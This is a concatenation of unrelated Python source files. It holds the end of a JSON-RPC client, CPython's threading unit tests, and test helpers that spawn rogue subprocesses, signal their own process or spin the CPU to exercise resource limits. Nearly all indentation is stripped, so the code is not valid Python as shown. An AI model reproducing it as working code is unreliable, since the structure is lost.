if self._call_wait_queue:
q = self._call_wait_queue
self._call_wait_queue = None
else:
q = queue.Queue()
self._waiter_lock.release()
return q
def _free_wait_queue(self, q):
self._waiter_lock.acquire()
if not self._call_wait_queue:
self._call_wait_queue = q
else:
del q
self._waiter_lock.release()
def call(self, method, params, timeout=6):
# print "call", method, params, timeout
callid = self.next_callid()
if timeout:
q = self._alloc_wait_queue()
self._waiter_lock.acquire()
self._waiter_map[callid] = q
self._waiter_lock.release()
msg = {'jsonrpc': '2.0',
'method': method,
'params': params,
'id': str(callid)}
# print "SEND", msg
json_str = self._pack(msg)
self._send_request(json_str)
if timeout:
ret = {}
try:
r = q.get(timeout=timeout)
q.task_done()
except qEmpty:
r = None
self._waiter_lock.acquire()
self._waiter_map[callid] = None
self._waiter_lock.release()
self._free_wait_queue(q)
if r:
if 'result' in r:
ret['result'] = r['result']
if 'error' in r:
ret['error'] = r['error']
return ret if ret else {'error': {'error': -1, 'message': "timeout"}}
else:
return {'result': True}
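# Illustrative (hypothetical) usage of JRpcClient, not part of the original
# module: the address, method name and parameters below are placeholders.
def _example_jrpc_call(addr="tcp://127.0.0.1:8910"):
    client = JRpcClient(data_format="msgpack_snappy")
    client.on_connected = lambda: print("connected")
    client.on_disconnected = lambda: print("disconnected")
    client.connect(addr)
    # call() blocks for up to `timeout` seconds and returns either
    # {'result': ...}, {'error': ...} or a synthetic timeout error.
    rsp = client.call(".sys.heartbeat", {"time": time.time()}, timeout=2)
    client.close()
    return rsp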
|
test_threading.py
|
"""
Tests for the threading module.
"""
import test.support
from test.support import (verbose, import_module, cpython_only,
requires_type_collecting)
from test.support.script_helper import assert_python_ok, assert_python_failure
import random
import sys
import _thread
import threading
import time
import unittest
import weakref
import os
import subprocess
from test import lock_tests
from test import support
# Between fork() and exec(), only async-safe functions are allowed (issues
# #12316 and #11870), and fork() from a worker thread is known to trigger
# problems with some operating systems (issue #3863): skip problematic tests
# on platforms known to behave badly.
platforms_to_skip = ('freebsd4', 'freebsd5', 'freebsd6', 'netbsd5',
'hp-ux11')
# A trivial mutable counter.
class Counter(object):
def __init__(self):
self.value = 0
def inc(self):
self.value += 1
def dec(self):
self.value -= 1
def get(self):
return self.value
class TestThread(threading.Thread):
def __init__(self, name, testcase, sema, mutex, nrunning):
threading.Thread.__init__(self, name=name)
self.testcase = testcase
self.sema = sema
self.mutex = mutex
self.nrunning = nrunning
def run(self):
delay = random.random() / 10000.0
if verbose:
print('task %s will run for %.1f usec' %
(self.name, delay * 1e6))
with self.sema:
with self.mutex:
self.nrunning.inc()
if verbose:
print(self.nrunning.get(), 'tasks are running')
self.testcase.assertLessEqual(self.nrunning.get(), 3)
time.sleep(delay)
if verbose:
print('task', self.name, 'done')
with self.mutex:
self.nrunning.dec()
self.testcase.assertGreaterEqual(self.nrunning.get(), 0)
if verbose:
print('%s is finished. %d tasks are running' %
(self.name, self.nrunning.get()))
class BaseTestCase(unittest.TestCase):
def setUp(self):
self._threads = test.support.threading_setup()
def tearDown(self):
test.support.threading_cleanup(*self._threads)
test.support.reap_children()
class ThreadTests(BaseTestCase):
# Create a bunch of threads, let each do some work, wait until all are
# done.
def test_various_ops(self):
# This takes about n/3 seconds to run (about n/3 clumps of tasks,
# times about 1 second per clump).
NUMTASKS = 10
# no more than 3 of the 10 can run at once
sema = threading.BoundedSemaphore(value=3)
mutex = threading.RLock()
numrunning = Counter()
threads = []
for i in range(NUMTASKS):
t = TestThread("<thread %d>"%i, self, sema, mutex, numrunning)
threads.append(t)
self.assertIsNone(t.ident)
self.assertRegex(repr(t), r'^<TestThread\(.*, initial\)>$')
t.start()
if verbose:
print('waiting for all tasks to complete')
for t in threads:
t.join()
self.assertFalse(t.is_alive())
self.assertNotEqual(t.ident, 0)
self.assertIsNotNone(t.ident)
self.assertRegex(repr(t), r'^<TestThread\(.*, stopped -?\d+\)>$')
if verbose:
print('all tasks done')
self.assertEqual(numrunning.get(), 0)
def test_ident_of_no_threading_threads(self):
# The ident still must work for the main thread and dummy threads.
self.assertIsNotNone(threading.currentThread().ident)
def f():
ident.append(threading.currentThread().ident)
done.set()
done = threading.Event()
ident = []
with support.wait_threads_exit():
tid = _thread.start_new_thread(f, ())
done.wait()
self.assertEqual(ident[0], tid)
# Kill the "immortal" _DummyThread
del threading._active[ident[0]]
# run with a small(ish) thread stack size (256 KiB)
def test_various_ops_small_stack(self):
if verbose:
print('with 256 KiB thread stack size...')
try:
threading.stack_size(262144)
except _thread.error:
raise unittest.SkipTest(
'platform does not support changing thread stack size')
self.test_various_ops()
threading.stack_size(0)
# run with a large thread stack size (1 MiB)
def test_various_ops_large_stack(self):
if verbose:
print('with 1 MiB thread stack size...')
try:
threading.stack_size(0x100000)
except _thread.error:
raise unittest.SkipTest(
'platform does not support changing thread stack size')
self.test_various_ops()
threading.stack_size(0)
def test_foreign_thread(self):
# Check that a "foreign" thread can use the threading module.
def f(mutex):
# Calling current_thread() forces an entry for the foreign
# thread to get made in the threading._active map.
threading.current_thread()
mutex.release()
mutex = threading.Lock()
mutex.acquire()
with support.wait_threads_exit():
tid = _thread.start_new_thread(f, (mutex,))
# Wait for the thread to finish.
mutex.acquire()
self.assertIn(tid, threading._active)
self.assertIsInstance(threading._active[tid], threading._DummyThread)
#Issue 29376
self.assertTrue(threading._active[tid].is_alive())
self.assertRegex(repr(threading._active[tid]), '_DummyThread')
del threading._active[tid]
# PyThreadState_SetAsyncExc() is a CPython-only gimmick, not (currently)
# exposed at the Python level. This test relies on ctypes to get at it.
def test_PyThreadState_SetAsyncExc(self):
ctypes = import_module("ctypes")
set_async_exc = ctypes.pythonapi.PyThreadState_SetAsyncExc
set_async_exc.argtypes = (ctypes.c_ulong, ctypes.py_object)
class AsyncExc(Exception):
pass
exception = ctypes.py_object(AsyncExc)
# First check it works when setting the exception from the same thread.
tid = threading.get_ident()
self.assertIsInstance(tid, int)
self.assertGreater(tid, 0)
try:
result = set_async_exc(tid, exception)
# The exception is async, so we might have to keep the VM busy until
# it notices.
while True:
pass
except AsyncExc:
pass
else:
# This code is unreachable but it reflects the intent. If we wanted
# to be smarter the above loop wouldn't be infinite.
self.fail("AsyncExc not raised")
try:
self.assertEqual(result, 1) # one thread state modified
except UnboundLocalError:
# The exception was raised too quickly for us to get the result.
pass
# `worker_started` is set by the thread when it's inside a try/except
# block waiting to catch the asynchronously set AsyncExc exception.
# `worker_saw_exception` is set by the thread upon catching that
# exception.
worker_started = threading.Event()
worker_saw_exception = threading.Event()
class Worker(threading.Thread):
def run(self):
self.id = threading.get_ident()
self.finished = False
try:
while True:
worker_started.set()
time.sleep(0.1)
except AsyncExc:
self.finished = True
worker_saw_exception.set()
t = Worker()
t.daemon = True # so if this fails, we don't hang Python at shutdown
t.start()
if verbose:
print(" started worker thread")
# Try a thread id that doesn't make sense.
if verbose:
print(" trying nonsensical thread id")
result = set_async_exc(-1, exception)
self.assertEqual(result, 0) # no thread states modified
# Now raise an exception in the worker thread.
if verbose:
print(" waiting for worker thread to get started")
ret = worker_started.wait()
self.assertTrue(ret)
if verbose:
print(" verifying worker hasn't exited")
self.assertFalse(t.finished)
if verbose:
print(" attempting to raise asynch exception in worker")
result = set_async_exc(t.id, exception)
self.assertEqual(result, 1) # one thread state modified
if verbose:
print(" waiting for worker to say it caught the exception")
worker_saw_exception.wait(timeout=10)
self.assertTrue(t.finished)
if verbose:
print(" all OK -- joining worker")
if t.finished:
t.join()
# else the thread is still running, and we have no way to kill it
def test_limbo_cleanup(self):
# Issue 7481: Failure to start thread should cleanup the limbo map.
def fail_new_thread(*args):
raise threading.ThreadError()
_start_new_thread = threading._start_new_thread
threading._start_new_thread = fail_new_thread
try:
t = threading.Thread(target=lambda: None)
self.assertRaises(threading.ThreadError, t.start)
self.assertFalse(
t in threading._limbo,
"Failed to cleanup _limbo map on failure of Thread.start().")
finally:
threading._start_new_thread = _start_new_thread
def test_finalize_runnning_thread(self):
# Issue 1402: the PyGILState_Ensure / _Release functions may be called
# very late on python exit: on deallocation of a running thread for
# example.
import_module("ctypes")
rc, out, err = assert_python_failure("-c", """if 1:
import ctypes, sys, time, _thread
# This lock is used as a simple event variable.
ready = _thread.allocate_lock()
ready.acquire()
# Module globals are cleared before __del__ is run
# So we save the functions in class dict
class C:
ensure = ctypes.pythonapi.PyGILState_Ensure
release = ctypes.pythonapi.PyGILState_Release
def __del__(self):
state = self.ensure()
self.release(state)
def waitingThread():
x = C()
ready.release()
time.sleep(100)
_thread.start_new_thread(waitingThread, ())
ready.acquire() # Be sure the other thread is waiting.
sys.exit(42)
""")
self.assertEqual(rc, 42)
def test_finalize_with_trace(self):
# Issue1733757
# Avoid a deadlock when sys.settrace steps into threading._shutdown
assert_python_ok("-c", """if 1:
import sys, threading
# A deadlock-killer, to prevent the
# testsuite from hanging forever
def killer():
import os, time
time.sleep(2)
print('program blocked; aborting')
os._exit(2)
t = threading.Thread(target=killer)
t.daemon = True
t.start()
# This is the trace function
def func(frame, event, arg):
threading.current_thread()
return func
sys.settrace(func)
""")
def test_join_nondaemon_on_shutdown(self):
# Issue 1722344
# Raising SystemExit skipped threading._shutdown
rc, out, err = assert_python_ok("-c", """if 1:
import threading
from time import sleep
def child():
sleep(1)
# As a non-daemon thread we SHOULD wake up and nothing
# should be torn down yet
print("Woke up, sleep function is:", sleep)
threading.Thread(target=child).start()
raise SystemExit
""")
self.assertEqual(out.strip(),
b"Woke up, sleep function is: <built-in function sleep>")
self.assertEqual(err, b"")
def test_enumerate_after_join(self):
# Try hard to trigger #1703448: a thread is still returned in
# threading.enumerate() after it has been join()ed.
enum = threading.enumerate
old_interval = sys.getswitchinterval()
try:
for i in range(1, 100):
sys.setswitchinterval(i * 0.0002)
t = threading.Thread(target=lambda: None)
t.start()
t.join()
l = enum()
self.assertNotIn(t, l,
"#1703448 triggered after %d trials: %s" % (i, l))
finally:
sys.setswitchinterval(old_interval)
def test_no_refcycle_through_target(self):
class RunSelfFunction(object):
def __init__(self, should_raise):
# The links in this refcycle from Thread back to self
# should be cleaned up when the thread completes.
self.should_raise = should_raise
self.thread = threading.Thread(target=self._run,
args=(self,),
kwargs={'yet_another':self})
self.thread.start()
def _run(self, other_ref, yet_another):
if self.should_raise:
raise SystemExit
cyclic_object = RunSelfFunction(should_raise=False)
weak_cyclic_object = weakref.ref(cyclic_object)
cyclic_object.thread.join()
del cyclic_object
self.assertIsNone(weak_cyclic_object(),
msg=('%d references still around' %
sys.getrefcount(weak_cyclic_object())))
raising_cyclic_object = RunSelfFunction(should_raise=True)
weak_raising_cyclic_object = weakref.ref(raising_cyclic_object)
raising_cyclic_object.thread.join()
del raising_cyclic_object
self.assertIsNone(weak_raising_cyclic_object(),
msg=('%d references still around' %
sys.getrefcount(weak_raising_cyclic_object())))
def test_old_threading_api(self):
# Just a quick sanity check to make sure the old method names are
# still present
t = threading.Thread()
t.isDaemon()
t.setDaemon(True)
t.getName()
t.setName("name")
t.isAlive()
e = threading.Event()
e.isSet()
threading.activeCount()
def test_repr_daemon(self):
t = threading.Thread()
self.assertNotIn('daemon', repr(t))
t.daemon = True
self.assertIn('daemon', repr(t))
def test_daemon_param(self):
t = threading.Thread()
self.assertFalse(t.daemon)
t = threading.Thread(daemon=False)
self.assertFalse(t.daemon)
t = threading.Thread(daemon=True)
self.assertTrue(t.daemon)
@unittest.skipUnless(hasattr(os, 'fork'), 'test needs fork()')
def test_dummy_thread_after_fork(self):
# Issue #14308: a dummy thread in the active list doesn't mess up
# the after-fork mechanism.
code = """if 1:
import _thread, threading, os, time
def background_thread(evt):
# Creates and registers the _DummyThread instance
threading.current_thread()
evt.set()
time.sleep(10)
evt = threading.Event()
_thread.start_new_thread(background_thread, (evt,))
evt.wait()
assert threading.active_count() == 2, threading.active_count()
if os.fork() == 0:
assert threading.active_count() == 1, threading.active_count()
os._exit(0)
else:
os.wait()
"""
_, out, err = assert_python_ok("-c", code)
self.assertEqual(out, b'')
self.assertEqual(err, b'')
@unittest.skipUnless(hasattr(os, 'fork'), "needs os.fork()")
def test_is_alive_after_fork(self):
# Try hard to trigger #18418: is_alive() could sometimes be True on
# threads that vanished after a fork.
old_interval = sys.getswitchinterval()
self.addCleanup(sys.setswitchinterval, old_interval)
# Make the bug more likely to manifest.
test.support.setswitchinterval(1e-6)
for i in range(20):
t = threading.Thread(target=lambda: None)
t.start()
pid = os.fork()
if pid == 0:
os._exit(11 if t.is_alive() else 10)
else:
t.join()
pid, status = os.waitpid(pid, 0)
self.assertTrue(os.WIFEXITED(status))
self.assertEqual(10, os.WEXITSTATUS(status))
def test_main_thread(self):
main = threading.main_thread()
self.assertEqual(main.name, 'MainThread')
self.assertEqual(main.ident, threading.current_thread().ident)
self.assertEqual(main.ident, threading.get_ident())
def f():
self.assertNotEqual(threading.main_thread().ident,
threading.current_thread().ident)
th = threading.Thread(target=f)
th.start()
th.join()
@unittest.skipUnless(hasattr(os, 'fork'), "test needs os.fork()")
@unittest.skipUnless(hasattr(os, 'waitpid'), "test needs os.waitpid()")
def test_main_thread_after_fork(self):
code = """if 1:
import os, threading
pid = os.fork()
if pid == 0:
main = threading.main_thread()
print(main.name)
print(main.ident == threading.current_thread().ident)
print(main.ident == threading.get_ident())
else:
os.waitpid(pid, 0)
"""
_, out, err = assert_python_ok("-c", code)
data = out.decode().replace('\r', '')
self.assertEqual(err, b"")
self.assertEqual(data, "MainThread\nTrue\nTrue\n")
@unittest.skipIf(sys.platform in platforms_to_skip, "due to known OS bug")
@unittest.skipUnless(hasattr(os, 'fork'), "test needs os.fork()")
@unittest.skipUnless(hasattr(os, 'waitpid'), "test needs os.waitpid()")
def test_main_thread_after_fork_from_nonmain_thread(self):
code = """if 1:
import os, threading, sys
def f():
pid = os.fork()
if pid == 0:
main = threading.main_thread()
print(main.name)
print(main.ident == threading.current_thread().ident)
print(main.ident == threading.get_ident())
# stdout is fully buffered because not a tty,
# we have to flush before exit.
sys.stdout.flush()
else:
os.waitpid(pid, 0)
th = threading.Thread(target=f)
th.start()
th.join()
"""
_, out, err = assert_python_ok("-c", code)
data = out.decode().replace('\r', '')
self.assertEqual(err, b"")
self.assertEqual(data, "Thread-1\nTrue\nTrue\n")
def test_main_thread_during_shutdown(self):
# bpo-31516: current_thread() should still point to the main thread
# at shutdown
code = """if 1:
import gc, threading
main_thread = threading.current_thread()
assert main_thread is threading.main_thread() # sanity check
class RefCycle:
def __init__(self):
self.cycle = self
def __del__(self):
print("GC:",
threading.current_thread() is main_thread,
threading.main_thread() is main_thread,
threading.enumerate() == [main_thread])
RefCycle()
gc.collect() # sanity check
x = RefCycle()
"""
_, out, err = assert_python_ok("-c", code)
data = out.decode()
self.assertEqual(err, b"")
self.assertEqual(data.splitlines(),
["GC: True True True"] * 2)
def test_tstate_lock(self):
# Test an implementation detail of Thread objects.
started = _thread.allocate_lock()
finish = _thread.allocate_lock()
started.acquire()
finish.acquire()
def f():
started.release()
finish.acquire()
time.sleep(0.01)
# The tstate lock is None until the thread is started
t = threading.Thread(target=f)
self.assertIs(t._tstate_lock, None)
t.start()
started.acquire()
self.assertTrue(t.is_alive())
# The tstate lock can't be acquired when the thread is running
# (or suspended).
tstate_lock = t._tstate_lock
self.assertFalse(tstate_lock.acquire(timeout=0), False)
finish.release()
# When the thread ends, the state_lock can be successfully
# acquired.
self.assertTrue(tstate_lock.acquire(timeout=5), False)
# But is_alive() is still True: we hold _tstate_lock now, which
# prevents is_alive() from knowing the thread's end-of-life C code
# is done.
self.assertTrue(t.is_alive())
# Let is_alive() find out the C code is done.
tstate_lock.release()
self.assertFalse(t.is_alive())
# And verify the thread disposed of _tstate_lock.
self.assertIsNone(t._tstate_lock)
t.join()
def test_repr_stopped(self):
# Verify that "stopped" shows up in repr(Thread) appropriately.
started = _thread.allocate_lock()
finish = _thread.allocate_lock()
started.acquire()
finish.acquire()
def f():
started.release()
finish.acquire()
t = threading.Thread(target=f)
t.start()
started.acquire()
self.assertIn("started", repr(t))
finish.release()
# "stopped" should appear in the repr in a reasonable amount of time.
# Implementation detail: as of this writing, that's trivially true
# if .join() is called, and almost trivially true if .is_alive() is
# called. The detail we're testing here is that "stopped" shows up
# "all on its own".
LOOKING_FOR = "stopped"
for i in range(500):
if LOOKING_FOR in repr(t):
break
time.sleep(0.01)
self.assertIn(LOOKING_FOR, repr(t)) # we waited at least 5 seconds
t.join()
def test_BoundedSemaphore_limit(self):
# BoundedSemaphore should raise ValueError if released too often.
for limit in range(1, 10):
bs = threading.BoundedSemaphore(limit)
threads = [threading.Thread(target=bs.acquire)
for _ in range(limit)]
for t in threads:
t.start()
for t in threads:
t.join()
threads = [threading.Thread(target=bs.release)
for _ in range(limit)]
for t in threads:
t.start()
for t in threads:
t.join()
self.assertRaises(ValueError, bs.release)
@cpython_only
def test_frame_tstate_tracing(self):
# Issue #14432: Crash when a generator is created in a C thread that is
# destroyed while the generator is still used. The issue was that a
# generator contains a frame, and the frame kept a reference to the
# Python state of the destroyed C thread. The crash occurs when a trace
# function is setup.
def noop_trace(frame, event, arg):
# no operation
return noop_trace
def generator():
while 1:
yield "generator"
def callback():
if callback.gen is None:
callback.gen = generator()
return next(callback.gen)
callback.gen = None
old_trace = sys.gettrace()
sys.settrace(noop_trace)
try:
# Install a trace function
threading.settrace(noop_trace)
# Create a generator in a C thread which exits after the call
import _testcapi
_testcapi.call_in_temporary_c_thread(callback)
# Call the generator in a different Python thread, check that the
# generator didn't keep a reference to the destroyed thread state
for test in range(3):
# The trace function is still called here
callback()
finally:
sys.settrace(old_trace)
class ThreadJoinOnShutdown(BaseTestCase):
def _run_and_join(self, script):
script = """if 1:
import sys, os, time, threading
# a thread, which waits for the main program to terminate
def joiningfunc(mainthread):
mainthread.join()
print('end of thread')
# stdout is fully buffered because not a tty, we have to flush
# before exit.
sys.stdout.flush()
\n""" + script
rc, out, err = assert_python_ok("-c", script)
data = out.decode().replace('\r', '')
self.assertEqual(data, "end of main\nend of thread\n")
def test_1_join_on_shutdown(self):
# The usual case: on exit, wait for a non-daemon thread
script = """if 1:
import os
t = threading.Thread(target=joiningfunc,
args=(threading.current_thread(),))
t.start()
time.sleep(0.1)
print('end of main')
"""
self._run_and_join(script)
@unittest.skipUnless(hasattr(os, 'fork'), "needs os.fork()")
@unittest.skipIf(sys.platform in platforms_to_skip, "due to known OS bug")
def test_2_join_in_forked_process(self):
# Like the test above, but from a forked interpreter
script = """if 1:
childpid = os.fork()
if childpid != 0:
os.waitpid(childpid, 0)
sys.exit(0)
t = threading.Thread(target=joiningfunc,
args=(threading.current_thread(),))
t.start()
print('end of main')
"""
self._run_and_join(script)
@unittest.skipUnless(hasattr(os, 'fork'), "needs os.fork()")
@unittest.skipIf(sys.platform in platforms_to_skip, "due to known OS bug")
def test_3_join_in_forked_from_thread(self):
# Like the test above, but fork() was called from a worker thread
# In the forked process, the main Thread object must be marked as stopped.
script = """if 1:
main_thread = threading.current_thread()
def worker():
childpid = os.fork()
if childpid != 0:
os.waitpid(childpid, 0)
sys.exit(0)
t = threading.Thread(target=joiningfunc,
args=(main_thread,))
print('end of main')
t.start()
t.join() # Should not block: main_thread is already stopped
w = threading.Thread(target=worker)
w.start()
"""
self._run_and_join(script)
@unittest.skipIf(sys.platform in platforms_to_skip, "due to known OS bug")
def test_4_daemon_threads(self):
# Check that a daemon thread cannot crash the interpreter on shutdown
# by manipulating internal structures that are being disposed of in
# the main thread.
script = """if True:
import os
import random
import sys
import time
import threading
thread_has_run = set()
def random_io():
'''Loop for a while sleeping random tiny amounts and doing some I/O.'''
while True:
in_f = open(os.__file__, 'rb')
stuff = in_f.read(200)
null_f = open(os.devnull, 'wb')
null_f.write(stuff)
time.sleep(random.random() / 1995)
null_f.close()
in_f.close()
thread_has_run.add(threading.current_thread())
def main():
count = 0
for _ in range(40):
new_thread = threading.Thread(target=random_io)
new_thread.daemon = True
new_thread.start()
count += 1
while len(thread_has_run) < count:
time.sleep(0.001)
# Trigger process shutdown
sys.exit(0)
main()
"""
rc, out, err = assert_python_ok('-c', script)
self.assertFalse(err)
@unittest.skipUnless(hasattr(os, 'fork'), "needs os.fork()")
@unittest.skipIf(sys.platform in platforms_to_skip, "due to known OS bug")
def test_reinit_tls_after_fork(self):
# Issue #13817: fork() would deadlock in a multithreaded program with
# the ad-hoc TLS implementation.
def do_fork_and_wait():
# just fork a child process and wait it
pid = os.fork()
if pid > 0:
os.waitpid(pid, 0)
else:
os._exit(0)
# start a bunch of threads that will fork() child processes
threads = []
for i in range(16):
t = threading.Thread(target=do_fork_and_wait)
threads.append(t)
t.start()
for t in threads:
t.join()
@unittest.skipUnless(hasattr(os, 'fork'), "needs os.fork()")
def test_clear_threads_states_after_fork(self):
# Issue #17094: check that threads states are cleared after fork()
# start a bunch of threads
threads = []
for i in range(16):
t = threading.Thread(target=lambda : time.sleep(0.3))
threads.append(t)
t.start()
pid = os.fork()
if pid == 0:
# check that threads states have been cleared
if len(sys._current_frames()) == 1:
os._exit(0)
else:
os._exit(1)
else:
_, status = os.waitpid(pid, 0)
self.assertEqual(0, status)
for t in threads:
t.join()
class SubinterpThreadingTests(BaseTestCase):
def test_threads_join(self):
# Non-daemon threads should be joined at subinterpreter shutdown
# (issue #18808)
r, w = os.pipe()
self.addCleanup(os.close, r)
self.addCleanup(os.close, w)
code = r"""if 1:
import os
import threading
import time
def f():
# Sleep a bit so that the thread is still running when
# Py_EndInterpreter is called.
time.sleep(0.05)
os.write(%d, b"x")
threading.Thread(target=f).start()
""" % (w,)
ret = test.support.run_in_subinterp(code)
self.assertEqual(ret, 0)
# The thread was joined properly.
self.assertEqual(os.read(r, 1), b"x")
def test_threads_join_2(self):
# Same as above, but a delay gets introduced after the thread's
# Python code returned but before the thread state is deleted.
# To achieve this, we register a thread-local object which sleeps
# a bit when deallocated.
r, w = os.pipe()
self.addCleanup(os.close, r)
self.addCleanup(os.close, w)
code = r"""if 1:
import os
import threading
import time
class Sleeper:
def __del__(self):
time.sleep(0.05)
tls = threading.local()
def f():
# Sleep a bit so that the thread is still running when
# Py_EndInterpreter is called.
time.sleep(0.05)
tls.x = Sleeper()
os.write(%d, b"x")
threading.Thread(target=f).start()
""" % (w,)
ret = test.support.run_in_subinterp(code)
self.assertEqual(ret, 0)
# The thread was joined properly.
self.assertEqual(os.read(r, 1), b"x")
@cpython_only
def test_daemon_threads_fatal_error(self):
subinterp_code = r"""if 1:
import os
import threading
import time
def f():
# Make sure the daemon thread is still running when
# Py_EndInterpreter is called.
time.sleep(10)
threading.Thread(target=f, daemon=True).start()
"""
script = r"""if 1:
import _testcapi
_testcapi.run_in_subinterp(%r)
""" % (subinterp_code,)
with test.support.SuppressCrashReport():
rc, out, err = assert_python_failure("-c", script)
self.assertIn("Fatal Python error: Py_EndInterpreter: "
"not the last thread", err.decode())
class ThreadingExceptionTests(BaseTestCase):
# A RuntimeError should be raised if Thread.start() is called
# multiple times.
def test_start_thread_again(self):
thread = threading.Thread()
thread.start()
self.assertRaises(RuntimeError, thread.start)
thread.join()
def test_joining_current_thread(self):
current_thread = threading.current_thread()
self.assertRaises(RuntimeError, current_thread.join);
def test_joining_inactive_thread(self):
thread = threading.Thread()
self.assertRaises(RuntimeError, thread.join)
def test_daemonize_active_thread(self):
thread = threading.Thread()
thread.start()
self.assertRaises(RuntimeError, setattr, thread, "daemon", True)
thread.join()
def test_releasing_unacquired_lock(self):
lock = threading.Lock()
self.assertRaises(RuntimeError, lock.release)
@unittest.skipUnless(sys.platform == 'darwin' and test.support.python_is_optimized(),
'test macosx problem')
def test_recursion_limit(self):
# Issue 9670
# test that excessive recursion within a non-main thread causes
# an exception rather than crashing the interpreter on platforms
# like Mac OS X or FreeBSD which have small default stack sizes
# for threads
script = """if True:
import threading
def recurse():
return recurse()
def outer():
try:
recurse()
except RecursionError:
pass
w = threading.Thread(target=outer)
w.start()
w.join()
print('end of main thread')
"""
expected_output = "end of main thread\n"
p = subprocess.Popen([sys.executable, "-c", script],
stdout=subprocess.PIPE, stderr=subprocess.PIPE)
stdout, stderr = p.communicate()
data = stdout.decode().replace('\r', '')
self.assertEqual(p.returncode, 0, "Unexpected error: " + stderr.decode())
self.assertEqual(data, expected_output)
def test_print_exception(self):
script = r"""if True:
import threading
import time
running = False
def run():
global running
running = True
while running:
time.sleep(0.01)
1/0
t = threading.Thread(target=run)
t.start()
while not running:
time.sleep(0.01)
running = False
t.join()
"""
rc, out, err = assert_python_ok("-c", script)
self.assertEqual(out, b'')
err = err.decode()
self.assertIn("Exception in thread", err)
self.assertIn("Traceback (most recent call last):", err)
self.assertIn("ZeroDivisionError", err)
self.assertNotIn("Unhandled exception", err)
@requires_type_collecting
def test_print_exception_stderr_is_none_1(self):
script = r"""if True:
import sys
import threading
import time
running = False
def run():
global running
running = True
while running:
time.sleep(0.01)
1/0
t = threading.Thread(target=run)
t.start()
while not running:
time.sleep(0.01)
sys.stderr = None
running = False
t.join()
"""
rc, out, err = assert_python_ok("-c", script)
self.assertEqual(out, b'')
err = err.decode()
self.assertIn("Exception in thread", err)
self.assertIn("Traceback (most recent call last):", err)
self.assertIn("ZeroDivisionError", err)
self.assertNotIn("Unhandled exception", err)
def test_print_exception_stderr_is_none_2(self):
script = r"""if True:
import sys
import threading
import time
running = False
def run():
global running
running = True
while running:
time.sleep(0.01)
1/0
sys.stderr = None
t = threading.Thread(target=run)
t.start()
while not running:
time.sleep(0.01)
running = False
t.join()
"""
rc, out, err = assert_python_ok("-c", script)
self.assertEqual(out, b'')
self.assertNotIn("Unhandled exception", err.decode())
def test_bare_raise_in_brand_new_thread(self):
def bare_raise():
raise
class Issue27558(threading.Thread):
exc = None
def run(self):
try:
bare_raise()
except Exception as exc:
self.exc = exc
thread = Issue27558()
thread.start()
thread.join()
self.assertIsNotNone(thread.exc)
self.assertIsInstance(thread.exc, RuntimeError)
# explicitly break the reference cycle to not leak a dangling thread
thread.exc = None
class TimerTests(BaseTestCase):
def setUp(self):
BaseTestCase.setUp(self)
self.callback_args = []
self.callback_event = threading.Event()
def test_init_immutable_default_args(self):
# Issue 17435: constructor defaults were mutable objects, they could be
# mutated via the object attributes and affect other Timer objects.
timer1 = threading.Timer(0.01, self._callback_spy)
timer1.start()
self.callback_event.wait()
timer1.args.append("blah")
timer1.kwargs["foo"] = "bar"
self.callback_event.clear()
timer2 = threading.Timer(0.01, self._callback_spy)
timer2.start()
self.callback_event.wait()
self.assertEqual(len(self.callback_args), 2)
self.assertEqual(self.callback_args, [((), {}), ((), {})])
timer1.join()
timer2.join()
def _callback_spy(self, *args, **kwargs):
self.callback_args.append((args[:], kwargs.copy()))
self.callback_event.set()
class LockTests(lock_tests.LockTests):
locktype = staticmethod(threading.Lock)
class PyRLockTests(lock_tests.RLockTests):
locktype = staticmethod(threading._PyRLock)
@unittest.skipIf(threading._CRLock is None, 'RLock not implemented in C')
class CRLockTests(lock_tests.RLockTests):
locktype = staticmethod(threading._CRLock)
class EventTests(lock_tests.EventTests):
eventtype = staticmethod(threading.Event)
class ConditionAsRLockTests(lock_tests.RLockTests):
# Condition uses an RLock by default and exports its API.
locktype = staticmethod(threading.Condition)
class ConditionTests(lock_tests.ConditionTests):
condtype = staticmethod(threading.Condition)
class SemaphoreTests(lock_tests.SemaphoreTests):
semtype = staticmethod(threading.Semaphore)
class BoundedSemaphoreTests(lock_tests.BoundedSemaphoreTests):
semtype = staticmethod(threading.BoundedSemaphore)
class BarrierTests(lock_tests.BarrierTests):
barriertype = staticmethod(threading.Barrier)
class MiscTestCase(unittest.TestCase):
def test__all__(self):
extra = {"ThreadError"}
blacklist = {'currentThread', 'activeCount'}
support.check__all__(self, threading, ('threading', '_thread'),
extra=extra, blacklist=blacklist)
if __name__ == "__main__":
unittest.main()
|
windows_test_cases.py
|
#! /bin/python
import time
import multiprocessing
import unittest
import os
import sys
import signal
import logging
import pynisher
import psutil
try:
import sklearn
is_sklearn_available = True
except ImportError:
print("Scikit Learn was not found!")
is_sklearn_available = False
all_tests=1
logger = multiprocessing.log_to_stderr()
logger.setLevel(logging.WARNING)
# TODO: add tests with large return value to test for deadlock!
def rogue_subprocess():
pid = os.getpid()
oldgrp = os.getpgrp()
os.setpgrp()
logger.debug("{}: Changed group id from {} to {}".format(pid, oldgrp, os.getpgrp()))
time.sleep(60)
def spawn_rogue_subprocess(num_procs = 5):
for i in range(num_procs):
p = multiprocessing.Process(target=rogue_subprocess, daemon=False)
p.start()
p = psutil.Process()
time.sleep(10)
def simulate_work(size_in_mb, wall_time_in_s, num_processes):
# allocate memory (size_in_mb) with an array
# note the actual size in memory of this process is a little bit larger
A = [42.]*((1024*1024*size_in_mb)//8)
# try to spawn new processes
if (num_processes > 0):
# data parallelism
multiprocessing.Pool(num_processes)
# sleep for specified duration
time.sleep(wall_time_in_s+1)
return(size_in_mb, wall_time_in_s, num_processes)
def svm_example(n_samples = 10000, n_features = 100):
from sklearn.svm import SVR
from sklearn.datasets import make_regression
X,Y = make_regression(n_samples, n_features)
m = SVR()
m.fit(X,Y)
def svc_example(n_samples = 10000, n_features = 4):
from sklearn.svm import LinearSVC
from sklearn.preprocessing import PolynomialFeatures
from sklearn.datasets import make_classification
X,Y = make_classification(n_samples, n_features)
#pp = PolynomialFeatures(degree=3)
#X = pp.fit_transform(X)
m = LinearSVC()
m.fit(X,Y)
def crash_unexpectedly(signum):
print("going to receive signal {}.".format(signum))
pid = os.getpid()
time.sleep(1)
os.kill(pid, signum)
time.sleep(1)
def return_big_array(num_elements):
return([1]*num_elements)
def cpu_usage():
i = 1
while True:
i += 1
def print_and_sleep(t):
for i in range(t):
print(i)
time.sleep(1)
def print_and_fail():
print(0)
raise RuntimeError()
